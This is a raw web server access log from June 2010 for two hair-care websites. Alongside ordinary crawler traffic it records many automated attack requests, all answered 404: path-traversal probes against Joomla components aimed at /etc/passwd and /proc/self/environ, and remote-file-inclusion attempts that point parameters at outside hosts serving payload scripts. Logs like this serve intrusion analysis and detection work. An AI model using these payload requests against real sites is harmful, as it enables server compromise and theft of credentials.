67.59.156.163 - - [21/Jun/2010:05:14:02 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:05:14:02 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:05:14:02 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:05:17:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15181 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:05:19:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12001 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
207.250.188.45 - - [21/Jun/2010:05:20:19 -0700] "GET /logs/access_100531.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.chiceco.com/idasc.txt?????? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
207.250.188.45 - - [21/Jun/2010:05:20:19 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.chiceco.com/idasc.txt?????? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
207.250.188.45 - - [21/Jun/2010:05:20:19 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.chiceco.com/idasc.txt?????? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:05:21:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14023 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:05:21:38 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.59.156.163 - - [21/Jun/2010:05:21:39 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.59.156.163 - - [21/Jun/2010:05:21:39 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.108.142.138 - - [21/Jun/2010:05:23:31 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.142.138 - - [21/Jun/2010:05:23:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.142.138 - - [21/Jun/2010:05:23:33 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.142.138 - - [21/Jun/2010:05:23:34 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.142.138 - - [21/Jun/2010:05:23:35 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.142.138 - - [21/Jun/2010:05:23:36 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
193.105.210.173 - - [21/Jun/2010:05:25:58 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
193.105.210.173 - - [21/Jun/2010:05:25:58 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
203.172.211.204 - - [21/Jun/2010:05:26:49 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
212.117.167.149 - - [21/Jun/2010:05:27:19 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/7.54 (Windows NT 5.1; U) [pl]" "growlonghairfast.com"
212.117.167.149 - - [21/Jun/2010:05:27:20 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/7.54 (Windows NT 5.1; U) [pl]" "growlonghairfast.com"
89.108.64.232 - - [21/Jun/2010:05:33:59 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:05:34:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13316 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
207.250.188.45 - - [21/Jun/2010:05:35:09 -0700] "GET /logs/access_100125.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.chiceco.com/idasc.txt?????? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
78.46.91.40 - - [21/Jun/2010:05:40:36 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.46.91.40 - - [21/Jun/2010:05:40:36 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.46.91.40 - - [21/Jun/2010:05:40:36 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:05:42:18 -0700] "POST /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:05:42:18 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:05:42:18 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:05:42:42 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:05:43:29 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:05:43:29 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:05:43:30 -0700] "POST /logs/access.log%20%20/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
194.42.16.25 - - [21/Jun/2010:05:45:45 -0700] "GET /logs/access.log%20%20//index.php?sourcedir=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.42.16.25 - - [21/Jun/2010:05:45:45 -0700] "GET /logs//index.php?sourcedir=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.42.16.25 - - [21/Jun/2010:05:45:45 -0700] "GET /logs/access.log%20%20//index.php?sourcedir=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.42.16.25 - - [21/Jun/2010:05:45:45 -0700] "GET /index.php?sourcedir=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.42.16.25 - - [21/Jun/2010:05:45:45 -0700] "GET /logs//index.php?sourcedir=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.42.16.25 - - [21/Jun/2010:05:45:45 -0700] "GET /index.php?sourcedir=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.42.16.25 - - [21/Jun/2010:05:46:47 -0700] "GET /logs//index.php?sourcedir=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.42.16.25 - - [21/Jun/2010:05:46:47 -0700] "GET /logs/access.log%20%20//index.php?sourcedir=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.42.16.25 - - [21/Jun/2010:05:46:47 -0700] "GET /index.php?sourcedir=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:05:47:24 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:05:49:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14922 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
87.118.114.5 - - [21/Jun/2010:05:50:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "www.freehairsecrets.com"
87.118.114.5 - - [21/Jun/2010:05:50:03 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:05:50:17 -0700] "GET /logs/access_090720.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:05:52:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14287 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:05:53:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12851 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:06:11:43 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:06:11:43 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:06:11:43 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:06:14:35 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:06:15:42 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
64.251.10.117 - - [21/Jun/2010:06:16:03 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.251.10.117 - - [21/Jun/2010:06:16:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.251.10.117 - - [21/Jun/2010:06:16:03 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.251.10.117 - - [21/Jun/2010:06:16:06 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.251.10.117 - - [21/Jun/2010:06:16:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.251.10.117 - - [21/Jun/2010:06:16:06 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:06:21:35 -0700] "GET /logs/access_090817.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:06:22:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12622 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:06:27:48 -0700] "GET /index.php?option=com_gcalendar&controller=http://lindademor1.dominiotemporario.com/b.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:06:28:40 -0700] "GET /index.php?option=com_gcalendar&controller=http://lindademor1.dominiotemporario.com/b.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:06:38:00 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:06:38:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:06:38:00 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:06:40:24 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:06:40:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:06:40:25 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
95.108.150.235 - - [21/Jun/2010:06:46:53 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [21/Jun/2010:06:46:54 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [21/Jun/2010:06:46:55 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [21/Jun/2010:06:46:56 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [21/Jun/2010:06:46:57 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [21/Jun/2010:06:47:01 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:06:48:56 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=http://lindademor1.dominiotemporario.com/b.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:06:48:57 -0700] "GET /index.php?option=com_gcalendar&controller=http://lindademor1.dominiotemporario.com/b.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:06:48:57 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://lindademor1.dominiotemporario.com/b.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
69.73.139.201 - - [21/Jun/2010:06:49:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.73.139.201 - - [21/Jun/2010:06:49:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:06:51:10 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=http://lindademor1.dominiotemporario.com/b.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:06:51:11 -0700] "GET /index.php?option=com_gcalendar&controller=http://lindademor1.dominiotemporario.com/b.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:06:51:11 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://lindademor1.dominiotemporario.com/b.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
69.73.139.201 - - [21/Jun/2010:06:52:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.73.139.201 - - [21/Jun/2010:06:52:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
119.63.198.92 - - [21/Jun/2010:06:56:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13414 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
119.63.198.70 - - [21/Jun/2010:06:57:01 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13285 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:06:59:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13370 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
69.73.139.201 - - [21/Jun/2010:07:07:32 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.73.139.201 - - [21/Jun/2010:07:07:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.73.139.201 - - [21/Jun/2010:07:07:33 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.73.139.201 - - [21/Jun/2010:07:07:38 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.73.139.201 - - [21/Jun/2010:07:07:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.73.139.201 - - [21/Jun/2010:07:07:38 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.73.139.201 - - [21/Jun/2010:07:08:17 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.73.139.201 - - [21/Jun/2010:07:08:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.73.139.201 - - [21/Jun/2010:07:08:17 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.73.139.201 - - [21/Jun/2010:07:08:20 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.73.139.201 - - [21/Jun/2010:07:08:20 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.73.139.201 - - [21/Jun/2010:07:08:20 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:07:08:51 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:07:08:52 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:07:08:52 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:07:09:00 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:07:09:00 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:07:09:00 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
67.30.129.57 - - [21/Jun/2010:07:11:42 -0700] "GET /logs/send_reminders.php?includedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [21/Jun/2010:07:11:42 -0700] "GET /send_reminders.php?includedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [21/Jun/2010:07:11:42 -0700] "GET /logs/access_100111.log%20%20/send_reminders.php?includedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [21/Jun/2010:07:12:10 -0700] "GET /logs/send_reminders.php?includedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [21/Jun/2010:07:12:10 -0700] "GET /send_reminders.php?includedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [21/Jun/2010:07:12:47 -0700] "GET /logs/access_100111.log%20%20/send_reminders.php?includedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.108.64.232 - - [21/Jun/2010:07:19:04 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
